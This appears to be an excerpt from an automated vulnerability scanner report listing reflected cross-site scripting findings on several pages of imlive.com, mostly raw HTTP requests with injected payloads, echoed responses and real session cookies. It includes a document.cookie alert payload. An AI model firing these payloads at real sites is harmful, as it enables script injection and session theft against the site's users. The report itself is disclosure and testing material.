GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:33 GMT Connection: close Content-Length: 2375 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:11 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 14486 Vary: Accept-Encoding
2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/warningms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 14469 Vary: Accept-Encoding
2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 75081 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad ...[SNIP]...
2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-advanced-search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:53 GMT Connection: close Content-Length: 74955 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1 ...[SNIP]...
2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
